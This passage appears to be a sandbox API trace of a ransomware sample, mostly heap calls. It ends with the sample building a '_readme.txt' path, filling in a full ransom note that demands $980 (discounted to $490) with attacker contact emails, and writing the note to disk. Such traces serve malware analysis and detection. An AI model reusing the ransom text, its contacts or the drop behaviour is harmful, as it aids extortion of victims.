hHeap=0x620000) returned 1 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.787] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0142.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.787] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.787] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.787] PathFindFileNameW (pszPath="") returned="" [0142.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.787] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.787] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.787] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.788] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.788] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0142.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.788] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0142.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.789] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.789] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.789] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or 